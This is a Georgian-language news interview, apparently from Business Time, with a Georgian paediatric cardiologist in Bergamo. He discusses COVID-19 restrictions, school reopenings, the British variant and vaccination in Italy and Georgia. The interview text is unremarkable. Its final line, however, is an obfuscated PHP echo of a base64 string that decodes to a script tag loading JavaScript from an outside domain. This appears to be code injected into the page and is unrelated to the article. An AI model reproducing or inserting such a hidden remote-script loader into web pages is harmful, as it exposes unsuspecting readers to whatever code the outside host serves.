celsiusi
ავერსი შნაიდერი
როგორ მიმდინარეობს იტალიაში ვაქცინაციის პროცესი, დღეის მდგომარეობით, რა რეგულაციები მოქმედებს ქვეყანაში და როგორია ეპიდემიოლოგიური მდგომარეობა იტალიაში?  - ამ და სხვა საკითხებზე საინფორმაციო სააგენტო "Business Time"-ი იტალიაში მოღვაწე ქართველ ექიმს, ქალაქ ბერაგამოს (იტალია) კლინიკის ბავშვთა კარდიოლოგ - დავით მათიაშვილს დაუკავშირდა.
 
დავით, 3 მარტის მდგომარეობით, საქართველოში დადებითობის დღიური მაჩვენებელი არის 1.25%, ბოლო 14 დღის მანძილზე - 1.65%, ხოლო 7 დღის მანძილზე - 1.25%. სააკოორდინაციო საბჭოს გადაწყვეტილებით, რეგულაციები ეტაბობრივად იხსნება, ძალაში მხოლოდ რჩება კომენდატის საათი. თქვენი შეფასებით, რამდენად დროულია დღეს არსებული ეპიდემიოლოგიური მდგომარეობიდან გამომდინარე სკოლების, ბაღების და რესტორნების სრულად გახნსა?
 
პირველ რიგში, ძალიან დიდი მადლობა დაინტერესებისთვის. რაც შეეხება თქვენს კითხვას, ვფიქრობ რომ ყველა რეგულაციის მოხსნა ქვეყანაში ვაქცინის არქონის პირობებში ნაჩქარევი იყო. (მაშინ როდესაც ქვეყნები, ვაქცინაციის მაღალი ციფრების მიუხედავად, მაინც მიმართავენ ლოქდაუნს) ჩემი აზრით, ზოგადად არაეფექტურად რეგულირდება რიგი საკითხები, და უკეთესი, ბევრად მოქნილი სისტემა არის შესაქმნელი.
 
აუცილებლად მინდა საუბრისას იტალიაში არსებულ მდგომარეობასაც  შევეხოთ. დღეს რა მდგომარეობაა, რა რეგულაციები მოქმედებს და შეზღუდვების შემსუბუქება, რა თანმიმდევრობით მიმდინარეობდა? 
 
დღეის სიტუაციით იტალია მიმართავს რეგიონული რეგულაციის სისტემას, რომელიც პირდაპირ ეფუძვნება პოზიტიური და ჰოსპიტალიზირებული პაციენტების რაოდენობის ზრდას. 2 კვირის წინ ლომბარდია გაყვითლდა, ამიტომ გაიხსნა ბარები და რესტორნები. პირველი მარტიდან ლომბარდია დაბრუნდა ნარინჯისფერ ზონად, რამაც ცოტახნისწინ გახსნილი რესტორნები და ბარები ხელახლა დაკეტა. რიგ ქლაქაებში სიტუაცია მძიმდება და მოლოდინია რომ 14 მარტიდან წითელ ზონად გადავიქცევით და სრული "ლოქდაუნი" იქნება გამოცხადებული. გარეთ გასვლა შეგვეძლება მხოლოდ სპეციალური ფურცლის შევსებით - სამსახურში, გადაუდებელ შემთხვევებში, სავარჯიშოდ და გასასეირნებლად სახლის მიმდებარე ტერიტორიაზე.
 
საქართველოში ბევრი აკრიტიკებს ხელისუფლებას დაწესებულ კომენდანტი საათის გამო. საზოგადოების ნაწილი ამბობს, რომ ლოგიკას ვერ ხედავენ ამაში. რომ გვითხრათ, რამდენად საჭირო ზომაა ეს და კომენდანტი საათი რა ეტაბზე მოიხსნა იტალიაში? 
 
დაწესებულ კომენდანტის საათზე ვხედავ ლოგიკას, მაგრამ ვერ ვხედავ ლოგიკას იმ მოქმედებებთან მიმართებაში, რასაც ჩვენი მთავრობა უკვე თვეებია გვთავაზობს. ვერ ვხედავ, რატომ არის კომენდანტის საათი პრინციპული წერტილი კოვიდთან ბრძოლაში?! ჩემთვის ეს უბრალოდ გაუგებარია. მაშინ როდესაც შეუძლიათ თუნდაც იტალიის მოდელი გადაიღონ.
 
განსაკუთრებით, თქვენი ყურადღება გვსურს მივაქციოთ სკოლების და ბაღების გახსნას. ბოლო პერიოდში ვირუსის გავრცელებამ ბავშვებში საგრძნობლად იმატა. რამდენად და როგორ უნდა მოხდეს ბავშვების დაცვა, როგორ უნდა იყოს დაცული მათი უსაფრთხოება?  
 
იტალიაში ერთი კვირის წინ გახსნილი სკოლები, აი უკვე ერთ კვირაში იკეტება. აქდან დასკვნის გამოტანა მარტივია…
 
რას გვეტყვით გართულებებზე ბავშვებში, თავიდან ეს საკითხი გაცილებით უსაფრთხო გვეგონა, მოგვიანებით კი რეალობა შეიცვალა და მედიკოსებმა სახიფათო გართულებებზე დაიწყეს საუბარი.... 
 
დაიდო რამდენიმე კვლევა, რომელიც საუბრობს პოსტ-კოვიდ კავაზაკის სინდრომზე, მაგრამ ამ ეტაპისთვის რამის დაზუსტებით თქმა შეუძლებელია. არის რისკი მაგრამ, რამდენად დიდია ეს რისკი ჯერ არ არის ცნობილი.
 
"ბრიტანულ შტამზეც" უნდა გკითხოთ, იტალიური გამოცემები ბევრს წერენ იმასთან დაკავშირებით, რომ "ბრიტანული შტამი" ახალი საშიშროების მიზეზად იქცა, რას გვეტყვით ამაზე და ამ მხრივ რა მდგომარეობაა იტალიაში? (ჩვენთან უკვე 31 დადასტურებული შემთხვევა გვქონდა და ყველანი გამოჯანმრთელდნენ). 
 
"ბრიტანიულ შტამს" ასახელებენ დღევანელი გაზრდილი ციფრების მიზეზად. მოგეხსენაბათ რომ ბრიტანულ და სამხრეთ აფრიკულ შტამზე ვაქცინის ეფექტურობა არ არის დამტკიებული. ეს რეგულაციების გამკაცრების საბაბად შეიძლება ჩაითვალოს.
 
საქართველოში ჯერ არ შემოსულა ვაქცინა და შესაბამისად, ვაქცინაციის პროცესი არ დაწყებულა. ამ მხრივ რა მდგომარეობაა იტალიაში და როგორ მიმდინარეობს ეს პროცესი?
 
იტალიაში პირველ ეტაპზე მოხდა მედ პერსონალის, ხოლო 1 მარტიდან დაიწყო 80+ მოქალაეების აცრა. ცოტახანში დანარჩენი მოსახლეობის აცრაც დაიწყება. 
 
რომელიც ვაქცინით მიმდინარეობს ვაქცინაცია და ხომ არ დაფიქსირებულა გართულებები ამ პროცესის მიდინარეობისას? (მხედველობაში გავქვს, აცრილი ადამიანის მდგომარეობა) 
 
როგორც გითხარით 80+ წლის მოქალაქეების ვაქცინაცია "ფაიზერის" ვაქცინით დაიწყო, ხოლო დანარჩენი მოსახლეობის ვაქცინაცია "ასტრაზენეკას" ვაქცინით მოხდება. რაც შეეხნება კითხვის მეორე ნაწილს,  მე 3 კვირის წინ გავიკეთე "ფაიზერის" პირველი დოზა და არანაირი გართულება და არც რაიმე ტიპის ცვლილება მქონია. მეორე დოზის შემდეგ ზოგ ადამიანში იწვევს სიცხესა და სისუსტეს, ჩემ შემთხვევაში, მოგახსენებთ სამშაბათს.
 
ზოგადად მხოლოდ ვაქცინების ჩამოსვლა არარის საკმარისი, არანორმალურად დიდი ლოჯისტიკური რესურსი არის საჭირო ამ ყველაფრის სწორად დაგეგმვისთვის.
 
მაგალითად - მოგეხსენებათ, რომ "ფაიზერის" ვაქცინის ერთი ფლაკონი 6 პაციენტისთვის არის გათვლილი. ბევრი ადამიანის ვაქცინაციაზე არგამოცხადების გამო, დაახლოებით, მილიონი დოზა ვაქცინა გადაიყარა (მხოლოდ იტალიაში). დიდი იმედი მაქვს, რომ საქართველო კარგად აანალიზებს ლოჯისტიკურ სირთულეებს და საუკეთესო სპეციალისტებს დაავალებენ ამ საკითხის მოგვარებას. როგორი იმედიც მაქვს, რომ ეკონომისტების ჯგუფიც აქტიურად ჩაერთვება პანდემიის მართვაში რადგან მხოლოდ ეპიდემიოლოგების და ექიმების მოსმენით დავრჩებით სამუდამოდ ჩაკეტილები. (ექიმის საქმე ეგ არის - პრევენცია,) კარგი მენეჯერის საქმეა მიღებული ინფორმაციის ანალიზი და სწორი მოქმედებაა. საქართველოს ამ ურთულესი პროცესის წარმატებით გავლას ვუსურვებ.  
 
 
4180
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");